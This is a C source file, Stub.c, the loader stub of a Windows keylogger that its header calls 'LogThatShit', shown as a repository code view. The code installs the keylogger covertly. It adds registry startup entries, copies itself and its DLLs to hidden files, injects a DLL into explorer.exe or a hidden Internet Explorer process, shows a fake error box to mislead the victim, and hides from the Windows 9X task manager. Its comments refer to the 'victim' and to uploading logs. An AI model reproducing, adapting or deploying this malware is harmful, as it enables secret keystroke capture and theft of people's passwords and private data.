/
Stub.c
800 lines (669 loc) · 24.6 KB
/
Stub.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
// LogThatShit
// A stealthly keylogger designed on and for Windows XP
// By Isam M. <r0cket(NO_SPAM)jump@yahoo.com>
// http://biodegradablegeek.com
// This software file (the "File") is distributed under the terms of the
// GNU General Public License Version 3, (the "License"). You may use,
// redistribute and/or modify this File in accordance with the terms and
// conditions of the License, a copy of which is available along with the
// File in the license.txt file or by writing to
// Free Software Foundation, Inc.,
// 59 Temple Place,
// Suite 330, Boston, MA, 02111-1307
//
// or on the Internet at http://www.gnu.org/licenses/gpl.txt.
// THE FILE IS DISTRIBUTED AS-IS, WITHOUT WARRANTY OF ANY KIND. THE AUTHOR
// DOES NOT TAKE ANY RESPONSIBILITY FOR ANY DAMAGE OR LEGAL ISSUES YOU MAY
// FACE WHEN USING THIS APPLICATION. PLEASE NOTE THAT LTS WAS WRITTEN AND
// RELEASED FOR *EDUCATIONAL* PURPOSES ONLY AND IS NOT INTENDED TO BE USED
// FOR ANYTHING THAT MAY BE AGAINST THE LAW WHERE YOU LIVE. IF YOU DO NOT
// WANT THAT RESPONSIBILITY, PLEASE DONT COMPILE OR USE THIS APPLICATION.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <windows.h>
#include <tlhelp32.h>
#include "Stub.h"
#include "Common.h"
#include "Settings.h"
#define RAN_ON_BOOT_FLAG "/s"
char injectdll[MAX_PATH+1];
char path2me[MAX_PATH+1];
char rootpath[MAX_PATH+1];
char* block;
char* errmsg;
char* errcap;
LTSData data;
OS_PLATFORM GetPlatform() {
/* Get the operating system's platform, 9X or NT. */
OSVERSIONINFO info;
info.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (GetVersionEx(&info)) return (info.dwPlatformId==VER_PLATFORM_WIN32_NT) ? PLAT_NT : PLAT_9X;
WIN_ERR("Unable to get platform.");
return PLAT_ERROR;
}
int GetDefaultBrowser(char* buf, DWORD* sz) {
/* Get path to the default browser. Returns 1 on failure. */
#define REG_KEY_DEFAULT_BROWSER "HTTP\\shell\\open\\command"
HKEY hkey;
if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_CLASSES_ROOT, REG_KEY_DEFAULT_BROWSER, 0, KEY_READ, &hkey))
return 1;
if (ERROR_SUCCESS != RegQueryValueEx(hkey, 0, 0, 0, buf, sz)) {
RegCloseKey(hkey);
return 1;
}
RegCloseKey(hkey);
return 0;
}
int ImplementRunStartup() {
/* This is used on 9X and if ActiveX startup fails to be implemented on NT. */
#define RUN_LIKE_HELL "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
HKEY hkey;
char pathandflag[MAX_PATH];
/* Open the key. */
if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE, RUN_LIKE_HELL, 0, KEY_ALL_ACCESS, &hkey)) {
WIN_ERR("Failed opening run startup key.");
return 1;
}
/* Set the value. */
snprintf(pathandflag, MAX_PATH, "%s %s", path2me, RAN_ON_BOOT_FLAG);
pathandflag[MAX_PATH] = '\0';
if (RegSetValueEx(hkey, "qttask", 0, REG_SZ, pathandflag, strlen(pathandflag))) {
WIN_ERR("Failed to set run startup value.");
return 1;
}
/* Close the key. */
RegCloseKey(hkey);
return 0;
}
int ImplementDefaultStartup() {
/* We create a key in HKLM/.../Installed_tttponents, after the initial startup, a key
with the same name is created in HKCU/.../Installed_tttponents. If this key is present,
we will NOT startup again. We need to remove this key but it gets created _after_
we are launched. */
HKEY hkey;
DWORD disp;
DWORD sz;
FILETIME fuck;
char pathandflag[MAX_PATH];
char key[MAX_PATH];
char sub[255];
int a, b, c;
int found;
#define REG_STARTUP_PATTERN "{3b911tHr34t-9A"
#define ACTIVEX_REG_KEY "SOFTWARE\\Microsoft\\Active Setup\\Installed_tttponents\\"
/* We do not want to make a mess in the registry, So let's get rid of the previous key we
created. All keys we create will start with REG_STARTUP_PATTERN. First get rid of all
the keys we created in HKLM. */
if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE, ACTIVEX_REG_KEY, 0, KEY_ALL_ACCESS, &hkey)) {
for(a=0;;) {
sz = 255;
disp = RegEnumKeyEx(hkey, a++, sub, &sz, 0, 0, 0, &fuck);
if (ERROR_SUCCESS!=disp) {
if (ERROR_NO_MORE_ITEMS==disp) break;
}
/*_tttpare the key to our wildcard. Delete it if it matches. */
if (!strncmp(sub, REG_STARTUP_PATTERN, 15)) RegDeleteKey(hkey, sub);
}
}
#ifdef DEBUG_MODE
else { WIN_ERR("Unable to open key for enumeration."); }
#endif
/* Then all the keys that Windows creates in HKCU */
if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_CURRENT_USER, ACTIVEX_REG_KEY, 0, KEY_ALL_ACCESS, &hkey)) {
for(a=0;;) {
sz = 255;
disp = RegEnumKeyEx(hkey, a++, sub, &sz, 0, 0, 0, &fuck);
if (ERROR_SUCCESS!=disp) {
if (ERROR_NO_MORE_ITEMS==disp)
break;
}
/*_tttpare the key to our wildcard. Delete it if it matches. */
if (!strncmp(sub, REG_STARTUP_PATTERN, 15)) RegDeleteKey(hkey, sub);
}
}
#ifdef DEBUG_MODE
else {
WIN_ERR("Unable to open key for enumeration.");
}
#endif
/* Now create the new key and set the StubPath to point to us. */
/* Seed, we will be generating some random ints. */
srand((unsigned int)time(0));
/* Keep constructing a key name until a unique one is found. */
found = 0;
while (!found) {
/* Generate 3 ints (0-99) to use to create the random key. We can likey get away with 2 ints, but fuck it. */
a = (rand() % 100);
b = (rand() % 100);
c = (rand() % 100);
snprintf(key, MAX_PATH, ACTIVEX_REG_KEY REG_STARTUP_PATTERN "%dEC%d-bc5-00%.2d%.2d%d%dE%dC}", a, c, b, c, c, b, a);
key[MAX_PATH] = '\0';
/* Does it exist already? */
switch (RegOpenKeyEx(HKEY_LOCAL_MACHINE, key, 0, KEY_READ, &hkey)) {
case ERROR_SUCCESS:
/* Exists. Keep looking. */
RegCloseKey(hkey);
break;
case ERROR_INVALID_HANDLE:
case ERROR_FILE_NOT_FOUND:
case ERROR_BAD_PATHNAME:
/* Does not exist. Use this key. */
found = 1;
break;
}
}
/* Create the new key. */
if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, key, 0, 0, REG_OPTION_NON_VOLATILE, KEY_WRITE, 0, &hkey, &disp)) {
WIN_ERR("Failed creating activeX startup key.");
return 1;
}
/* Set the value of StubPath. */
snprintf(pathandflag, MAX_PATH, "%s %s", path2me, RAN_ON_BOOT_FLAG);
pathandflag[MAX_PATH] = '\0';
if (RegSetValueEx(hkey, "StubPath", 0, REG_SZ, pathandflag, strlen(pathandflag))) {
WIN_ERR("Failed setting activeX StubPath value.");
return 1;
}
/* Success. */
RegCloseKey(hkey);
return 0;
}
DWORD run(const char* const path, char hide) {
/* Run path using CreateProcess() */
STARTUPINFO startup;
PROCESS_INFORMATION proc;
ZeroMemory(&startup, sizeof(startup));
startup.cb = sizeof(startup);
if (hide) {
startup.dwFlags = STARTF_USESHOWWINDOW;
startup.wShowWindow = SW_HIDE;
}
if (CreateProcess(path,0,0,0,0,0,0,0,&startup,&proc))
return proc.dwProcessId;
WIN_ERR("Create process failed.");
return 0;
}
int Inject(const char* const dll, DWORD pid) {
HANDLE process;
DWORD written;
DWORD* parms;
HANDLE Thread;
DWORD tID;
FARPROC pLoadLibrary;
FARPROC pWriteProcessMemory;
FARPROC pCreateRemoteThread;
/* Open the process that we plan on injecting into. */
process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
if (!process) {
WIN_ERR("OpenProcess() on passed pID failed.");
return 1;
}
/* Allocate space for the DLL. */
parms = VirtualAllocEx(process, 0, 4096, MEM_tttMIT, PAGE_READWRITE);
if (!parms) {
WIN_ERR("VirtualAllocEx has failed.");
CloseHandle(process);
return 1;
}
/* Write the DLL filename to the allocated space. */
pWriteProcessMemory = GetProcAddress(GetModuleHandle("Kernel32.dll"), "WriteProcessMemory");
if (!pWriteProcessMemory) {
WIN_ERR("Getting address of WriteProcessMemoryA failed.");
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(process);
return 1;
}
if (!pWriteProcessMemory(process, parms, dll, 4096, &written)) {
WIN_ERR("WriteProcessMemory failed.");
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(process);
return 1;
}
pLoadLibrary = GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
if (!pLoadLibrary) {
WIN_ERR("GetProcAddr() failed");
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(process);
return 1;
}
/* Create a remote thread into the target process and have it load our DLL. */
pCreateRemoteThread = GetProcAddress(GetModuleHandle("Kernel32.dll"), "CreateRemoteThread");
if (!pCreateRemoteThread) {
WIN_ERR("Getting address of CreateRemoteThreadA failed.");
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(process);
return 1;
}
Thread = (HANDLE)pCreateRemoteThread(process, 0, 0, (LPTHREAD_START_ROUTINE) pLoadLibrary, parms, 0, &tID);
if (!Thread) {
WIN_ERR("CreateRemoteThread got fUCKed.");
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(process);
return 1;
}
/* We need to wait for thread proc to start before cleaning up, else it will be terminated. */
WaitForSingleObject(Thread, MUTEX_WAIT_MS);
/* Clean up. */
VirtualFreeEx(process, parms, 0, MEM_RELEASE);
CloseHandle(Thread);
CloseHandle(process);
return 0;
}
DWORD InjectionProcessId(const char* const process, PROC_TYPE type) {
/* We need to get a process ID to inject into it. We can either inject into a
running process such as Explorer.exe or we can stealthly spawn a process and
use that. process name is NOT case sensitive. */
/* XXX PSAPI works in NT/XP/2K. Toolhelp32 doesn't work in NT. */
if (RUNNING==type) {
int i;
PROCESSENTRY32 pe;
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (!snap) {
WIN_ERR("Getting a process snapshot has failed.");
return 0;
}
pe.dwSize = sizeof(PROCESSENTRY32);
for (i = Process32First(snap, &pe); i; i=Process32Next(snap, &pe)) {
if (0==strcmpi2(process, pe.szExeFile, MAX_PATH)) {
/* INFO(pe.szExeFile); */
CloseHandle(snap);
return pe.th32ProcessID;
}
}
CloseHandle(snap);
} else if (SPAWN==type) {
/* run(path, hide) returns the process Id or 0 on failure. */
return run(process, 1);
}
/* Failed to get pID to use for injection (bad!) */
return 0;
}
int LoadSettings(const char* const argv0) {
/* Return 1 on failure, 0 on success.
Settings are appended to this executable file. Read, and load them into a
file mapping so that the DLLS are able to read them.
Format of settings:
[ -(EXE data)- ]
[ InjectDLL ]
[ HookDLL ]
[ Block ]
[ Data ]
[ (LTS) ]
InjectDLL = Will be the DLL that handles setting the hook, uploading/archiving logs.
HookDLL = The actual hook proc that is logging keys to the file.
Block = A NUL-terminated block of data holding keys/values which include the victim's
alias, path to where we archive logs, etc. This is not a fixed struct because
the file names are not a fixed size. We need to dynamically parse them out.
Data = A fixed size struct that determines how big the block and DLLs are. This
is what we will use to find the offset to the DLLs and block. This also has a
flags struct.
(LTS)=Last three bytes of the file are 'O' 'K' and 'L' -- The update feature will check to
see that this is there before replacing the loader. A small check but it can help in a rare
situation where the file got corrupt.
*/
FILE* fp;
int offset;
char* tmp;
/* Settings are appended to us, let's get them now by reading ourself. */
fp = fopen(argv0, "rb");
if (!fp) {
WIN_ERR("Unable to open myself to read settings.");
return 1;
}
/* Check the last 3 bytes, make sure the signature is there. */
fseek(fp, -3, SEEK_END);
if (!('L'==fgetc(fp) && 'T'==fgetc(fp) && 'S'==fgetc(fp))) {
GEN_ERR("This EXE does not have our signature. Possibly corrupt.\nNot going to attempt reading settings.");
fclose(fp);
return 1;
}
/* Get the LTSData struct, this contains sizes which we will use to get the offset of
everything else. */
offset = 3 + sizeof(LTSData);
fseek(fp, -offset, SEEK_END);
fread(&data, sizeof(LTSData), 1, fp);
/* Get block of key/value pairs (settings). Start by allocating space for it. */
block = malloc(data.blocksz);
if (!block) {
WIN_ERR("Unable to allocate memory for block. Quitting.");
fclose(fp);
return 1;
}
offset += data.blocksz;
fseek(fp, -offset, SEEK_END);
fread(block, 1, data.blocksz, fp);
/* We will be using the root path a lot. So keep hold of it for now. */
tmp = SettingsGetValue(block, data.blocksz, "PATH");
if (!tmp) {
GEN_ERR("Unable to get root path. Going to use .../system32/");
strncpy(rootpath, "C:\\Windows\\System32\\", MAX_PATH);
}
strncpy(rootpath, tmp, MAX_PATH);
rootpath[MAX_PATH] = '\0';
free(tmp);
/* We need the path to where we will reside ASAP to implement startup. */
tmp = SettingsGetValue(block, data.blocksz, "FILENAME");
snprintf(path2me, MAX_PATH, "%s/%s", rootpath, tmp);
free(tmp);
/* Check if we should display a fake error. */
tmp = SettingsGetValue(block, data.blocksz, "FAKEERROR");
if (tmp && tmp[0]=='1') {
errmsg = SettingsGetValue(block, data.blocksz, "ERRMSG");
errcap = SettingsGetValue(block, data.blocksz, "ERRCAP");
free(tmp);
}
fclose(fp);
return 0;
}
int Installation(const char* const argv0) {
/* Output the DLL files required for Injection and system-wide hook. */
HANDLE mm;
int offset;
FILE *fp;
FILE *fp2;
char* tmp;
char* dll;
char path[MAX_PATH+1];
char* p;
/* DLLs are appended to us, let's get them now by reading ourself. */
fp = fopen(argv0, "rb");
if (!fp) {
WIN_ERR("Opening ourself to output DLLs has failed.");
return 1;
}
/* Output the injection DLL. */
offset = 3 + sizeof(LTSData) + data.blocksz + data.hooksz + data.injectsz;
fseek(fp, -offset, SEEK_END);
/* Allocate space for injection dll */
dll = malloc(data.injectsz);
if (!dll) {
WIN_ERR("Unable to allocate memory for injection DLL.");
fclose(fp);
return 1;
}
/* Copy DLL from EXE to memory. */
fread(dll, 1, data.injectsz, fp);
/* Construct the injection DLL name. It will go in a global variable, as we need it later on. */
tmp = SettingsGetValue(block, data.blocksz, "INJECTNAME");
snprintf(injectdll, MAX_PATH, "%s/%s", rootpath, tmp);
injectdll[MAX_PATH] = '\0';
free(tmp);
/* Why does it sometimes fail to overwrite? Just in case, manually remove the old one. */
remove(injectdll);
fp2 = fopen(injectdll, "wb");
if (fp2) {
/* File is open, output DLL from memory to disk. */
fwrite(dll, 1, data.injectsz, fp2);
fclose(fp2);
/* Make the DLL hidden. */
SetFileAttributes(injectdll, FILE_ATTRIBUTE_HIDDEN);
}
#ifdef DEBUG_MODE
else {WIN_ERR("Unable to open file to output Injection DLL to.\nFile likely in use.\nWill attempt to use the existing one.");}
#endif
/* Failed to output DLL or not, free the memory. */
free(dll);
/* Output the hook DLL. Allocate space for it in memory. */
dll = malloc(data.hooksz);
if (!dll) {
WIN_ERR("Unable to allocate memory for hook DLL.");
fclose(fp);
return 1;
}
/* Copy from disk to memory. */
fread(dll, 1, data.hooksz, fp);
/* Construct the DLL name. */
tmp = SettingsGetValue(block, data.blocksz, "HOOKNAME");
snprintf(path, MAX_PATH, "%s/%s", rootpath, tmp);
path[MAX_PATH] = '\0';
free(tmp);
remove(path);
fp2 = fopen(path, "wb");
if (fp2) {
/* Copy from memory to disk. */
fwrite(dll, 1, data.hooksz, fp2);
/* Close fp2 (Hook DLL) */
fclose(fp2);
/* Make the DLL hidden. */
SetFileAttributes(path, FILE_ATTRIBUTE_HIDDEN);
}
#ifdef DEBUG_MODE
else {WIN_ERR("Unable to open file to output hook DLL to.\nFile likely in use.\nWill attempt to use the existing one.")};
#endif
/* Failed to output DLL or not, free the memory and close the file */
free(dll);
fclose(fp);
/* Write the flag struct to a memory mapped buffer so the hook DLL can get access to it. */
mm = CreateFileMapping(INVALID_HANDLE_VALUE, 0, PAGE_READWRITE, 0, sizeof(LTSFlags), LTS_MMBUF_FLAGS);
if (!mm) {
WIN_ERR("Unable to create file mapping to write flag struct to.");
return 1;
}
p = MapViewOfFile(mm, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(LTSFlags));
if (!p) {
WIN_ERR("Unable to map a view of mapped buf to write flags.");
return 1;
}
CopyMemory(p, &data.flags, sizeof(LTSFlags));
UnmapViewOfFile(p);
/* Write the settings block (and size) to a memory mapped buffer so the injection DLL can get access to it. */
/* Start by writing the size of the block. */
mm = CreateFileMapping(INVALID_HANDLE_VALUE, 0, PAGE_READWRITE, 0, sizeof(data.blocksz), LTS_MMBUF_BLOCK_SZ);
if (!mm) {
WIN_ERR("Unable to create file mapping for settings block size.");
return 1;
}
p = MapViewOfFile(mm, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(data.blocksz));
if (!p) {
WIN_ERR("Unable to map a view of file mapping to write block size.");
return 1;
}
CopyMemory(p, &data.blocksz, sizeof(data.blocksz)); /* Copy the size first. */
UnmapViewOfFile(p);
/* and then the block itself. */
mm = CreateFileMapping(INVALID_HANDLE_VALUE, 0, PAGE_READWRITE, 0, data.blocksz, LTS_MMBUF_BLOCK);
if (!mm) {
WIN_ERR("Unable to create file mapping for block.");
return 1;
}
p = MapViewOfFile(mm, FILE_MAP_ALL_ACCESS, 0, 0, data.blocksz);
if (!p) {
WIN_ERR("Unable to map a view of file mapping to write block.");
return 1;
}
CopyMemory(p, block, data.blocksz);
UnmapViewOfFile(p);
/* Done with this. We have all the settings. Free it. */
free(block);
return 0;
}
int WINAPI WinMain(HINSTANCE inst, HINSTANCE prev, LPSTR argv, int show) {
char me[MAX_PATH+1];
HANDLE m;
FARPROC pCopyFile;
OS_PLATFORM platform;
char ranbyuser;
/* Look for a commandline flag indicating if we ran via Windows startup. */
if (!strcmpi2(argv, RAN_ON_BOOT_FLAG, strlen(RAN_ON_BOOT_FLAG))) {
ranbyuser = 0;
} else {
ranbyuser = 1;
}
/* Let's get the path to ourself. */
GetModuleFileName(0, me, MAX_PATH);
me[MAX_PATH] = '\0';
/* Stop annoying warning. */
#ifdef DEBUG_MODE
inst = prev = 0;
argv = 0;
show = 0;
#endif
/* We mainly need path2me. Let's load it now. */
if (LoadSettings(me)) {
GEN_ERR("LoadSettings() returned an error, not going to bother going on. Quitting.");
return 1;
}
/* Get the platform we are running on. */
platform = GetPlatform();
/* Implement startup method. */
if (PLAT_9X != platform) {
/* If ActiveX startup fails, use Run startup. (Rare) */
if (ImplementDefaultStartup()) ImplementRunStartup();
} else {
/* ActiveX works on 9X. But on 9X, we do not terminate, this will halt explorer. */
ImplementRunStartup();
}
/* Copy myself over to a path where we will reside forever.
Without remove(), CopyFile() sometimes doesn't overwrite,
even though it succeeds, wtf? */
remove(path2me);
pCopyFile = GetProcAddress(GetModuleHandle("Kernel32.dll"), "CopyFileA");
if (pCopyFile) {
pCopyFile(me, path2me, 0);
} else {
WIN_ERR("Could not get address of CopyFileA. Unable to copy ourself to PATH");
}
/* Make myself hidden. */
SetFileAttributes(path2me, FILE_ATTRIBUTE_HIDDEN);
/* If we are supposed to display a fake error AND we ran via user... */
if (ranbyuser && errmsg) {
/* Display a fake error message box. */
MessageBox(0, errmsg, errcap, MB_ICONERROR);
free(errmsg);
free(errcap);
}
/* Check to see if I am already running. If so, quit. */
CreateMutex(0, 1, MUTEX_NAME_RUNNING);
if (GetLastError()!=ERROR_SUCCESS) {
/* If we are NOT able to create the mutex, assume it's because it already exists. */
INFO("An instance of LTS is already running!\nExiting.");
/* Clean up from LoadSettings() */
free(block);
return 1;
}
/* Read settings. They are (supposed to be) appended to the LTS executable file. */
if (Installation(me)) {
INFO("Due to errors during installation, we will NOT continue.");
/* Clean up what LoadSettings() did. */
free(block);
return 1;
}
/* The rest depends on the OS platform. Let's get that now. If it's NOT 9X OR it
IS an error, assume it's NT */
if (PLAT_9X != platform) {
HANDLE confirm;
unsigned int i;
DWORD pid;
char success;
success = 0;
pid = 0;
confirm = 0;
/* Inject DLL into a process. */
#ifdef DEBUG_MODE
pid = InjectionProcessId("C:\\Windows\\System32\\calc.exe", SPAWN);
if (!pid) {
GEN_ERR("Getting pID of calc.exe has failed. Going to attempt default browser.");
}
#else
/* First target is Explorer. Get the PID */
pid = InjectionProcessId("explorer.exe", RUNNING);
#endif
/* If the pid is valid, Attempt to inject into the process. Otherwise, attempt def browser */
if (pid) {
Inject(injectdll, pid);
/* Wait for the confirmation mutex to be created by the injection DLL. */
INFO("Stub waiting for confirmation mutex.");
/* Wait 5 seconds (100ms * 50), if we still don't the confirmation mutex. Assume
the injection failed. */
for (i=0; i<50; ++i) {
confirm=OpenMutex(0, 0, MUTEX_NAME_DONE);
if (GetLastError()!=ERROR_FILE_NOT_FOUND) {
success = 1;
break;
}
Sleep(100);
}
}
/* If we did not get the mutex, attempt to inject into the default browser. */
if (!success) {
/* XXX Fix this. Get default browser and spawn it silently. */
/* char browser[MAX_PATH];
DWORD browsersz=MAX_PATH;
GEN_ERR("Injecting into a running Explorer.exe has failed.\nAttempting to spawn and inject into the default browser.");
GetDefaultBrowser(browser, &browsersz);
pid = InjectionProcessId(browser, SPAWN);
pid = InjectionProcessId("c:\\Program Files\\Mozilla Firefox\\firefox.exe", SPAWN); */
/* If we got the PID, use it. Else just use IE. */
GEN_ERR("Injecting into a running Explorer.exe has failed.\nAttempting to spawn and inject into IE.");
pid = InjectionProcessId("C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE", SPAWN);
if (pid) {
Inject(injectdll, pid);
/* Now wait for the confirmation mutex again. */
for (i=0; i<50; ++i) {
confirm=OpenMutex(0, 0, MUTEX_NAME_DONE);
if (GetLastError()!=ERROR_FILE_NOT_FOUND) {
success = 1;
break;
}
Sleep(100);
}
}
if (!success) {
/* Injection into default browser has failed as well. This should NEVER happen.
Let's just load the DLL manually then. */
HINSTANCE dll;
MSG msg;
GEN_ERR("Injection into default browser failed. Going to manually load DLL.");
dll = LoadLibrary(injectdll);
if (!dll) {
WIN_ERR("Unable to load DLL! -- Quitting.");
return 1;
}
while (GetMessage(&msg, 0, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
}
/* We got confirmation that the DLL successfully read the settings. We can now die. */
INFO("Success! Got confirmation mutex. Stub terminating.");
CloseHandle(confirm);
} else {
/* Windows 9X */
HINSTANCE dll;
HMODULE kernel32;
MSG msg;
/* Hide from task manager. (9X ONLY) */
kernel32 = LoadLibrary("Kernel32.dll");
if (kernel32) {
FARPROC rsp;
rsp = GetProcAddress(kernel32, "RegisterServiceProcess");
if (rsp) rsp(GetCurrentProcessId(), 1);
FreeLibrary(kernel32);
}
/* We can not inject into a process' address space on 9X. We *can* 'inject' using a
hook and LoadLibrary() but for now, let's just manually load the DLL and sit idle. */
dll = LoadLibrary(injectdll);
if (!dll) {
WIN_ERR("Unable to load injection DLL! -- Quitting.");
return 1;
}
/* This mutex is meant DLL injection, it tells us that the DLL has read the settings. */
for (;;) {
m=OpenMutex(0, 0, MUTEX_NAME_DONE);
if (GetLastError()!=ERROR_FILE_NOT_FOUND) break;
Sleep(200);
}
/* Unlike on NT w/ DLL injection, we can not terminate. Windows will unload the DLL. */
CloseHandle(m);
/* Just sit idle. DLL that we loaded should take care of the rest. */
INFO("Running on 9X. DLL has been loaded. Loader will sit in an idle loop.");
while (GetMessage(&msg, 0, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
return 0;
}